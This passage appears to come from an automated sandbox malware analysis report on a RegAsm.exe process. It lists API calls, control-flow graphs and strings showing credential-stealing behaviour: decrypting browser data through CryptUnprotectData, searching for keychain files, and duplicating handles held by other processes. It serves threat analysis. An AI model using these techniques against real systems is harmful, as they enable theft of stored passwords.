                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                              • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                              • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                              • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                              • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                              • memset.MSVCRT ref: 0040DF5F
                                                                                                                                              • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                                                                                              • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                              • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                              • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                              • API String ID: 2018390131-3398334509
                                                                                                                                              • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                              • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                              • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                              • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 505 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 508 413f00-413f11 Process32NextW 505->508 509 413da5-413ded OpenProcess 508->509 510 413f17-413f24 CloseHandle 508->510 511 413eb0-413eb5 509->511 512 413df3-413e26 memset call 413f27 509->512 511->508 513 413eb7-413ebd 511->513 519 413e79-413eae call 413959 call 413ca4 CloseHandle 512->519 520 413e28-413e35 512->520 516 413ec8-413eda call 4099f4 513->516 517 413ebf-413ec6 free 513->517 518 413edb-413ee2 516->518 517->518 525 413ee4 518->525 526 413ee7-413efe 518->526 519->511 522 413e61-413e68 520->522 523 413e37-413e44 GetModuleHandleW 520->523 522->519 529 413e6a-413e77 QueryFullProcessImageNameW 522->529 523->522 528 413e46-413e5c 523->528 525->526 526->508 528->522 529->519
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                              • memset.MSVCRT ref: 00413D7F
                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                              • memset.MSVCRT ref: 00413E07
                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                              • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00413EA8
                                                                                                                                              • free.MSVCRT ref: 00413EC1
                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Handle$CloseProcessProcess32freememset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                                                                                                                              • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                              • API String ID: 3957639419-1740548384
                                                                                                                                              • Opcode ID: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                                                                                              • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                              • Opcode Fuzzy Hash: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                                                                                              • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 770 40b58d-40b59e 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW 770->771 772 40b62e-40b632 770->772 773 40b5c2-40b5ce LoadResource 771->773 774 40b5e7 771->774 773->774 775 40b5d0-40b5e5 SizeofResource LockResource 773->775 776 40b5e9-40b5eb 774->776 775->776 776->772 777 40b5ed-40b5ef 776->777 777->772 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 777->778 778->772
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                              • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                              • String ID: BIN
                                                                                                                                              • API String ID: 1668488027-1015027815
                                                                                                                                              • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                              • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                              • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                              • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                              • free.MSVCRT ref: 00418803
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1355100292-0
                                                                                                                                              • Opcode ID: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                                                                                              • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                              • Opcode Fuzzy Hash: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                                                                                              • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                              APIs
                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1945712969-0
                                                                                                                                              • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                              • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                              • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                              • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFind$FirstNext
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1690352074-0
                                                                                                                                              • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                              • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                              • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                              • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0041898C
                                                                                                                                              • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InfoSystemmemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3558857096-0
                                                                                                                                              • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                              • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                              • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                              • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-445580 call 4136c0 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 52 445879-44587c 18->52 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 138 44592d-445945 call 40b6ef 24->138 139 44594a 24->139 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 53 445c7c-445c85 38->53 54 445b38-445b96 memset * 3 38->54 41->21 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 42->3 66 445585-44558c call 41366b 43->66 55 44584c-445854 call 40b1ab 45->55 56 445828 45->56 154 445665-445670 call 40b1ab 50->154 155 445643-445663 call 40a9b5 call 4087b3 50->155 67 4458a2-4458aa call 40b1ab 52->67 68 44587e 52->68 63 445d1c-445d25 53->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->69 70 445b98-445ba0 54->70 55->13 71 44582e-445847 call 40a9b5 call 4087b3 56->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 66->42 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 141 445849 71->141 93 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->93 94 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->94 146 44589f 85->146 86->53 103 44568b-4456a4 call 40a9b5 call 4087b3 87->103 106 4456ba-4456c4 88->106 165 445d67-445d6c 93->165 166 445d71-445d83 call 445093 93->166 196 445e17 94->196 197 445e1e-445e25 94->197 148 4456a9-4456b0 103->148 120 4457f9 106->120 121 4456ca-4456d3 call 413cfa call 413d4c 106->121 120->6 174 4456d8-4456f7 call 40b2cc call 413fa6 121->174 138->139 139->23 141->55 146->67 148->88 148->103 154->106 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 220 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->220 239 445e62-445e69 202->239 240 445e5b 202->240 219 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->219 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 219->76 253 445f9b 219->253 220->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->53 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->219 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 004455C2
                                                                                                                                              • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                              • memset.MSVCRT ref: 0044570D
                                                                                                                                              • memset.MSVCRT ref: 00445725
                                                                                                                                                • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                              • memset.MSVCRT ref: 0044573D
                                                                                                                                              • memset.MSVCRT ref: 00445755
                                                                                                                                              • memset.MSVCRT ref: 004458CB
                                                                                                                                              • memset.MSVCRT ref: 004458E3
                                                                                                                                              • memset.MSVCRT ref: 0044596E
                                                                                                                                              • memset.MSVCRT ref: 00445A10
                                                                                                                                              • memset.MSVCRT ref: 00445A28
                                                                                                                                              • memset.MSVCRT ref: 00445AC6
                                                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                              • memset.MSVCRT ref: 00445B52
                                                                                                                                              • memset.MSVCRT ref: 00445B6A
                                                                                                                                              • memset.MSVCRT ref: 00445C9B
                                                                                                                                              • memset.MSVCRT ref: 00445CB3
                                                                                                                                              • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                              • memset.MSVCRT ref: 00445B82
                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                              • memset.MSVCRT ref: 00445986
                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                              • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                              • API String ID: 2334598624-3798722523
                                                                                                                                              • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                              • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                              • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                              • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                              • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                              • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                                                                                                                              • String ID: $/deleteregkey$/savelangfile
                                                                                                                                              • API String ID: 1442760552-28296030
                                                                                                                                              • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                              • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                              • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                              • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040B71C
                                                                                                                                                • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                              • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                              • memset.MSVCRT ref: 0040B756
                                                                                                                                              • memset.MSVCRT ref: 0040B7F5
                                                                                                                                              • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                                                                                                                              • memset.MSVCRT ref: 0040B851
                                                                                                                                              • memset.MSVCRT ref: 0040B8CA
                                                                                                                                              • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                              • memset.MSVCRT ref: 0040BB53
                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                                                                                                                              • String ID: chp$v10
                                                                                                                                              • API String ID: 229402216-2783969131
                                                                                                                                              • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                                                                              • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                              • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                                                                              • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                                                • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                              • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                              • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
